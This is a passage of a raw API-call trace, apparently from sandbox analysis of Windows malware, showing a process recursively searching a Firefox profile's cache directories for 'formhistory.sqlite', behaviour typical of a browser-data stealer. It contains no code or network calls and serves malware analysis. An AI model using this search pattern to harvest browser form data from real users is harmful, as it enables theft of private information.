(lpString="7") returned 1 [0591.144] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\") returned 80 [0591.144] LocalAlloc (uFlags=0x40, uBytes=0x124) returned 0x2edc358 [0591.144] LocalFree (hMem=0x2edc490) returned 0x0 [0591.144] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\7") returned 81 [0591.144] lstrlenW (lpString="\\*.*") returned 4 [0591.144] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\7") returned 81 [0591.144] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc490 [0591.144] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\7\\*.*", lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0x5b9b10 [0591.145] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.145] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.145] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.145] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.145] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.145] lstrcmpiW (lpString1="26", lpString2=".") returned 1 [0591.145] lstrcmpiW (lpString1="26", lpString2="..") returned 1 [0591.145] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\7") returned 81 [0591.145] lstrlenW (lpString="\\") returned 1 [0591.145] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\7") returned 81 [0591.145] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc700 [0591.145] lstrlenW (lpString="26") returned 2 [0591.145] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\7\\") returned 82 [0591.145] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edc5c8 [0591.145] LocalFree (hMem=0x2edc700) returned 0x0 [0591.145] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\7\\26") returned 84 [0591.145] lstrlenW (lpString="\\*.*") returned 4 [0591.145] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\7\\26") returned 84 [0591.145] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ee0590 [0591.145] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\7\\26\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.145] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.145] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.145] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.145] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.145] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.145] lstrlenW (lpString="\\") returned 1 [0591.145] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\7\\26") returned 84 [0591.145] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc700 [0591.145] lstrlenW (lpString="90EEBd01") returned 8 [0591.145] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\7\\26\\") returned 85 [0591.145] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ee4408 [0591.145] LocalFree (hMem=0x2edc700) returned 0x0 [0591.145] StrStrIW (lpFirst="90EEBd01", lpSrch="formhistory.sqlite") returned 0x0 [0591.145] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.145] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.145] LocalFree (hMem=0x2ee0590) returned 0x0 [0591.145] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.145] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.145] lstrcmpiW (lpString1="60", lpString2=".") returned 1 [0591.145] lstrcmpiW (lpString1="60", lpString2="..") returned 1 [0591.145] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\7") returned 81 [0591.145] lstrlenW (lpString="\\") returned 1 [0591.145] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\7") returned 81 [0591.146] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc5c8 [0591.146] lstrlenW (lpString="60") returned 2 [0591.146] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\7\\") returned 82 [0591.146] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edc700 [0591.146] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.146] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\7\\60") returned 84 [0591.146] lstrlenW (lpString="\\*.*") returned 4 [0591.146] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\7\\60") returned 84 [0591.146] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ee0590 [0591.146] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\7\\60\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.146] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.146] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.146] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.146] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.146] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.146] lstrlenW (lpString="\\") returned 1 [0591.146] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\7\\60") returned 84 [0591.146] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc5c8 [0591.146] lstrlenW (lpString="85957d01") returned 8 [0591.146] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\7\\60\\") returned 85 [0591.146] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ee4550 [0591.146] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.146] StrStrIW (lpFirst="85957d01", lpSrch="formhistory.sqlite") returned 0x0 [0591.146] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.146] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.146] LocalFree (hMem=0x2ee0590) returned 0x0 [0591.146] LocalFree (hMem=0x2edc700) returned 0x0 [0591.146] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0 [0591.147] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0591.147] LocalFree (hMem=0x2edc490) returned 0x0 [0591.147] LocalFree (hMem=0x2edc358) returned 0x0 [0591.147] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0591.147] lstrcmpiW (lpString1="8", lpString2=".") returned 1 [0591.147] lstrcmpiW (lpString1="8", lpString2="..") returned 1 [0591.147] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.147] lstrlenW (lpString="\\") returned 1 [0591.147] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.147] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x2edc358 [0591.147] lstrlenW (lpString="8") returned 1 [0591.147] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\") returned 80 [0591.147] LocalAlloc (uFlags=0x40, uBytes=0x124) returned 0x2edc490 [0591.147] LocalFree (hMem=0x2edc358) returned 0x0 [0591.147] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\8") returned 81 [0591.147] lstrlenW (lpString="\\*.*") returned 4 [0591.147] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\8") returned 81 [0591.147] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc358 [0591.147] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\8\\*.*", lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0x5b9b10 [0591.147] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.147] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.147] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.147] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.147] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.147] lstrcmpiW (lpString1="AE", lpString2=".") returned 1 [0591.147] lstrcmpiW (lpString1="AE", lpString2="..") returned 1 [0591.147] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\8") returned 81 [0591.147] lstrlenW (lpString="\\") returned 1 [0591.147] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\8") returned 81 [0591.147] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc700 [0591.147] lstrlenW (lpString="AE") returned 2 [0591.147] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\8\\") returned 82 [0591.147] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edc5c8 [0591.147] LocalFree (hMem=0x2edc700) returned 0x0 [0591.147] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\8\\AE") returned 84 [0591.147] lstrlenW (lpString="\\*.*") returned 4 [0591.147] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\8\\AE") returned 84 [0591.147] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ee0590 [0591.147] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\8\\AE\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.148] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.148] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.148] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.148] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.148] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.148] lstrlenW (lpString="\\") returned 1 [0591.148] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\8\\AE") returned 84 [0591.148] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc700 [0591.148] lstrlenW (lpString="93407d01") returned 8 [0591.148] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\8\\AE\\") returned 85 [0591.148] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ee4698 [0591.148] LocalFree (hMem=0x2edc700) returned 0x0 [0591.148] StrStrIW (lpFirst="93407d01", lpSrch="formhistory.sqlite") returned 0x0 [0591.148] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.148] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.148] LocalFree (hMem=0x2ee0590) returned 0x0 [0591.148] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.148] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0 [0591.148] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0591.148] LocalFree (hMem=0x2edc358) returned 0x0 [0591.148] LocalFree (hMem=0x2edc490) returned 0x0 [0591.148] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0591.148] lstrcmpiW (lpString1="9", lpString2=".") returned 1 [0591.148] lstrcmpiW (lpString1="9", lpString2="..") returned 1 [0591.148] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.148] lstrlenW (lpString="\\") returned 1 [0591.148] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.148] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x2edc490 [0591.148] lstrlenW (lpString="9") returned 1 [0591.148] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\") returned 80 [0591.148] LocalAlloc (uFlags=0x40, uBytes=0x124) returned 0x2edc358 [0591.148] LocalFree (hMem=0x2edc490) returned 0x0 [0591.148] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9") returned 81 [0591.148] lstrlenW (lpString="\\*.*") returned 4 [0591.149] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9") returned 81 [0591.149] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc490 [0591.149] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\*.*", lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0x5b9b10 [0591.149] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.149] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.149] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.149] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.149] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.149] lstrcmpiW (lpString1="00", lpString2=".") returned 1 [0591.149] lstrcmpiW (lpString1="00", lpString2="..") returned 1 [0591.149] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9") returned 81 [0591.149] lstrlenW (lpString="\\") returned 1 [0591.149] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9") returned 81 [0591.149] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc5c8 [0591.149] lstrlenW (lpString="00") returned 2 [0591.149] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\") returned 82 [0591.149] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edc700 [0591.149] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.149] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\00") returned 84 [0591.149] lstrlenW (lpString="\\*.*") returned 4 [0591.149] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\00") returned 84 [0591.149] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ee0590 [0591.149] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\00\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.149] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.150] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.150] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.150] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.150] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.150] lstrlenW (lpString="\\") returned 1 [0591.150] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\00") returned 84 [0591.150] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc5c8 [0591.150] lstrlenW (lpString="7AABCd01") returned 8 [0591.150] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\00\\") returned 85 [0591.150] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ee47e0 [0591.150] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.150] StrStrIW (lpFirst="7AABCd01", lpSrch="formhistory.sqlite") returned 0x0 [0591.150] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.150] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.150] LocalFree (hMem=0x2ee0590) returned 0x0 [0591.150] LocalFree (hMem=0x2edc700) returned 0x0 [0591.150] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.150] lstrcmpiW (lpString1="10", lpString2=".") returned 1 [0591.150] lstrcmpiW (lpString1="10", lpString2="..") returned 1 [0591.150] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9") returned 81 [0591.150] lstrlenW (lpString="\\") returned 1 [0591.150] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9") returned 81 [0591.150] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc700 [0591.150] lstrlenW (lpString="10") returned 2 [0591.150] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\") returned 82 [0591.150] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edc5c8 [0591.150] LocalFree (hMem=0x2edc700) returned 0x0 [0591.150] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\10") returned 84 [0591.150] lstrlenW (lpString="\\*.*") returned 4 [0591.150] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\10") returned 84 [0591.150] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ee0590 [0591.150] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\10\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.151] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.151] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.151] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.151] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.151] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.151] lstrlenW (lpString="\\") returned 1 [0591.151] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\10") returned 84 [0591.151] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc700 [0591.151] lstrlenW (lpString="16A09d01") returned 8 [0591.151] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\10\\") returned 85 [0591.151] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ee4928 [0591.151] LocalFree (hMem=0x2edc700) returned 0x0 [0591.151] StrStrIW (lpFirst="16A09d01", lpSrch="formhistory.sqlite") returned 0x0 [0591.151] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.151] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.151] LocalFree (hMem=0x2ee0590) returned 0x0 [0591.151] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.151] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.151] lstrcmpiW (lpString1="2C", lpString2=".") returned 1 [0591.151] lstrcmpiW (lpString1="2C", lpString2="..") returned 1 [0591.151] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9") returned 81 [0591.151] lstrlenW (lpString="\\") returned 1 [0591.151] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9") returned 81 [0591.151] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc5c8 [0591.151] lstrlenW (lpString="2C") returned 2 [0591.151] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\") returned 82 [0591.151] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edc700 [0591.151] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.151] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\2C") returned 84 [0591.151] lstrlenW (lpString="\\*.*") returned 4 [0591.151] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\2C") returned 84 [0591.151] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ee0590 [0591.151] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\2C\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.152] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.152] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.152] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.152] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.152] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.152] lstrlenW (lpString="\\") returned 1 [0591.152] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\2C") returned 84 [0591.152] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc5c8 [0591.152] lstrlenW (lpString="24B53d01") returned 8 [0591.152] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\2C\\") returned 85 [0591.152] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ee4a70 [0591.152] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.152] StrStrIW (lpFirst="24B53d01", lpSrch="formhistory.sqlite") returned 0x0 [0591.152] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.152] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.152] LocalFree (hMem=0x2ee0590) returned 0x0 [0591.152] LocalFree (hMem=0x2edc700) returned 0x0 [0591.152] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.152] lstrcmpiW (lpString1="49", lpString2=".") returned 1 [0591.152] lstrcmpiW (lpString1="49", lpString2="..") returned 1 [0591.152] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9") returned 81 [0591.152] lstrlenW (lpString="\\") returned 1 [0591.152] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9") returned 81 [0591.152] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc700 [0591.152] lstrlenW (lpString="49") returned 2 [0591.152] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\") returned 82 [0591.152] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edc5c8 [0591.152] LocalFree (hMem=0x2edc700) returned 0x0 [0591.152] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\49") returned 84 [0591.152] lstrlenW (lpString="\\*.*") returned 4 [0591.152] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\49") returned 84 [0591.152] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ee0590 [0591.152] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\49\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.153] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.153] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.153] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.153] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.153] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.153] lstrlenW 